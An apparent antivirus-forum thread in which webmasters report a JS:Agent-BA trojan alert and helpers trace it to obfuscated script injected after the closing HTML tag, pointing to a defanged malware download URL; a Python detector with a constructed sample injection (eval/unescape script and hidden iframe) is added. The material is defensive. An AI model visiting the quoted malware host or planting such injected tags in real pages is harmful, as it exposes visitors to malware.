A website that has been fine for ages started generating a JS:Agent-BA[trj] error today. If one goes directly to a page within the site, no error is shown. The main page seems to generate this error for those of us running Avast and at least one person running AVG.
Anyone know what causes this? The webmaster is saying it looks like Avast is not reading the javascript menu correctly, but this has never happened previously.
Are you saying that both avast! and AVG detect the page? I’d say it’s quite likely that the site was hacked and indeed contains something malicious.
What’s the address of the website?
For the moment you can try to go to the page using Firefox with the NoScript add-on installed = enabled.
In that case avast won’t alert. What is the site’s name? Make the link so it cannot be clicked, like:
hxxp://ad.nl for instance,
Apparently the hosting site is dealing with the problem - now that they have acknowledged it as a problem. That’s really what I wanted - to know that yes, it was a problem and not just a false positive.
Yes, the old obfuscated (defeats DrWeb yet again) script tag, 16 lines outside of the closing HTML tag on one enormous single line. I have broken it up for ease and stripped out the blank lines.
Please help, when opening hxxp://www.guatemalaweb.com the browser tries to open
this page and freezes the browser, hXXp://116.50.15.25/stats/getfile.php?f=vispdf AVAST reported the JS:Agent-BA[trj] and I have removed the long script code after the html closing, but still
Thanks
Well the second IP address you also need to modify as you did for the first as that is likely to be where the malware payload is. However, the IP is for myrdns.com (HostFresh Internet) and is in Hong Kong.
DrWeb link checker also finds malware at the second link.
The guatemalaweb.com site opens now with no alert, so the chunk of script you removed appears to have done the trick.
However, I assume that you didn’t place the script after the closing HTML tag, so the page appears to have been hacked, and you might want to do checks for a similar issue on other pages. You might also want to change any site passwords and talk to the Host about how to combat this script injection.
The problem is that hxxp://www.cybershouts.com techs do not believe me, they claim everything is OK. As for the second IP, I’m not clear about what you mean, I am not very technical and I really will appreciate more details please. And I have never added the script at all, I deleted it once and it is also in other pages like hxxp://www.guatemalaweb.com/index.html which I will erase as soon as I change passwords. How do you think this guy is hacking so many webs at almost the same time? Thanks a lot
Well we had that lately with a Dutch site, then the man showed the threat to those that host the website or the webmaster himself, and they cleansed it and also changed all the log passwords so new or similar malware could not be installed anew. So if they do not seem to believe you, you can direct them to this site and confronted with what they see here, I think they can no longer ignore it, but some are in denial or just ignorant. Anyway you should be thanked for reporting this and also for protecting others that may go there. Surf safe and secure, and welcome to our forums,
Who are cybershouts.com? You didn’t mention them in your first post.
I can only assume that they are your web hosts.
The problem being that since you have stripped out the code after the closing html tag the evidence has gone, so when your web host checks it might find nothing. Taking a screen shot before removing the script would have given you some evidence.
By modifying the second IP I mean doing this hXXp://116.50.15.25/stats/getfile.php?f=vispdf changing the http to hXXp so the link isn’t active exposing forum members to accidental exposure…
So I have visited hxxp://www.guatemalaweb.com/index.html and gained some evidence in the form of images for you (right click on the image and select ‘save image as’ or words to that effect). I broke up the single line of the script tag to make it easier to see in the image.
Tell them that at the bottom of that page is a malicious script that you didn’t place there.
Many thanks again for the good lesson, I have done what it takes to survive another day in the web coded sea and you really have helped me, I just hope my hosting guys learn a bit from you guys too. They have been told. Sorry about the 2nd I.P., it will never happen again. Best regards. Rene
Hi,
I’m glad I found your forum. I hope this is not considered thread hijacking but I have the exact same problem. My site (hxxp://www.tribeazure.com) does not do this each time I go to it but it does it regularly. I have called my hosting company twice only to be told there is nothing they can do. They want a screenshot but the challenge there is once this particular 116.50.15.25…file is trying to open the computer completely freezes. I see one characteristic of this parasite is it sucks all of the virtual memory. It’s hard to take a screenshot when I am forced to shut the system off. I’m frustrated.
I do not find a long string of script on either of the pages this has happened to me but if I do I won’t take it out before taking the shot. I also referred the tech girl to this page to review this topic here so I tried that too.
Does this happen because the host has been compromised or is it my computer is infected and passes it to them? GRRR.
Thank you all in advance for any help you have to offer. I’m not as lucky as guateweb with his host.
For a Hosting company to say there is nothing that they can do about it speaks volumes about their technical ability (or the lack of it, that they can’t protect their servers and customers) and I would be looking elsewhere.
I visited your site and no alerts, so nothing there at the home page at this time. If you get it in the future you will have to check the page source code and you will be looking for either a or
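The check described in this thread (look at the page source for a script or iframe injected after the closing HTML tag, and write any URL it points at in non-clickable hxxp form before posting it) can be scripted so a webmaster can run it over saved copies of index pages before the evidence is removed. This is an added example, not code from the thread; the sample page and the 198.51.100.7 address are constructed for the demonstration.

```python
import re
import sys

# Constructed sample page: a normal document with a legitimate menu script,
# followed by an injected <script> and a hidden <iframe> after </html>,
# the pattern the thread describes. The IP is a documentation address.
SAMPLE_HTML = (
    "<html><head><title>Home</title></head>\n"
    "<body><h1>Welcome</h1><script src=\"menu.js\"></script></body>\n"
    "</html>\n\n\n"
    "<script>eval(unescape('%64%6f%63'))</script>"
    "<iframe src=\"http://198.51.100.7/stats/getfile.php?f=test\""
    " width=0 height=0></iframe>\n"
)

TAG_RE = re.compile(r"<(script|iframe)\b[^>]*>.*?</\1\s*>", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"\bhttps?://[^\s'\"<>]+", re.IGNORECASE)


def defang(url: str) -> str:
    """Rewrite http(s):// as hxxp(s):// so the link is not clickable when quoted."""
    return re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)


def trailing_content(html: str) -> str:
    """Return whatever follows the last </html> tag ('' if nothing, or no tag)."""
    last = None
    for last in re.finditer(r"</html\s*>", html, re.IGNORECASE):
        pass
    return html[last.end():].strip() if last else ""


def find_injected_tags(html: str) -> list:
    """List (tag, snippet, defanged_urls) for every script/iframe after </html>.

    Markup before </html> is left alone, so the page's own scripts are not flagged.
    """
    findings = []
    for m in TAG_RE.finditer(trailing_content(html)):
        snippet = m.group(0)
        urls = [defang(u) for u in URL_RE.findall(snippet)]
        findings.append((m.group(1).lower(), snippet[:80], urls))
    return findings


if __name__ == "__main__":
    # Usage: python check_tail.py saved_index.html  (defaults to the sample page)
    text = SAMPLE_HTML if len(sys.argv) < 2 else open(sys.argv[1], errors="replace").read()
    for tag, snippet, urls in find_injected_tags(text):
        print(f"{tag} after </html>: {snippet!r} urls={urls}")
```

Save the page source with "view source" rather than from the rendered browser, since the injected tag sits outside the document body and some viewers drop it.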
Thank you very much, David. My host is Godaddy. I am none too impressed with their tech department, if that’s what we want to call it. The worst part of all is they will not send the issue on to the REAL techies. I did find a way to get rid of it, at least until it infects the server at godaddy again. I republished the clean file again and that seemed to get rid of it. I have noticed it only affects the index pages of a site. It also seems to be a new problem because when searching this there was very little info and only recent info.